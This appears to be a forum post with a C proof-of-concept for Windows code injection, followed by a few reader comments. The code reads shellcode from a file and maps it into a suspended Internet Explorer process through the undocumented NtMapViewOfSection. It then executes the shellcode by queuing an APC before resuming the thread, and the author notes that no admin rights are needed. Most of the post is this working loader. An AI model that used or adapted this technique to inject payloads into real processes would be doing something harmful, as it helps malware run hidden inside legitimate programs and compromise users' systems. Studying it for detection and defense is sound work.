I found some new possibilities for executing code in the context of a remote process. Using a undocumented function for writing the code to the remote process address space, and a new methode for executing it in the context of it. The techniques working complete in userspace, and don't need any special requirements like admin rights or something like that. See the source of the PoC, it's pretty self explaining. Sorry for my english, I'm from germany...



#define _WIN32_WINNT 0x0400
#include <windows.h>


typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;



typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*,
                SECTION_INHERIT, ULONG, ULONG );

func_NtMapViewOfSection NtMapViewOfSection = NULL;


<cont>

LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh,
        DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )   
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;
ULONG Protect;
LPVOID ViewBase;


// Convert the offset
SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;

// Save the size and base
ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;

// Convert flags to NT Protection Attributes
if (dwDesiredAccess & FILE_MAP_WRITE)
{
  Protect  = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
  Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
  Protect = PAGE_WRITECOPY;
}
else
{
  Protect = PAGE_NOACCESS;
}

// Map the section
Status = NtMapViewOfSection(hFileMappingObject,
        hProcess,
        &ViewBase,
        0,
        0,
                                &SectionOffset,
        &ViewSize,
                                ViewShare,
                                0,
        Protect);
if (!NT_SUCCESS(Status))
{
  // We failed
  return NULL;
}

// Return the base
    return ViewBase;
}




int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
HMODULE hDll = LoadLibrary( "ntdll.dll" );

NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");


// Getting a shellcode, use whatever you want
HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);


// Starting target process
STARTUPINFO st;
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);

PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));

CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);


// Injecting the shellcode into target process address space
LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);


// Create a new APC which will be executed at first when the thread resume
QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);

ResumeThread (pi.hThread);


CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}


sincerely yours
yogle

read comments (20) / write comment

recent comments:

Don't compile 2!	knower	07.Jul:15:04
Don't compile!	knower	07.Jul:14:36
sniff :'(	babooon	18.Jun:13:00
Cool but well-known and not well explained...	SynApsus	30.May:20:01
IT IS A FULL BULLSHIT!	poorguy	28.May:14:36

. . .

views: 13421   printer-friendly version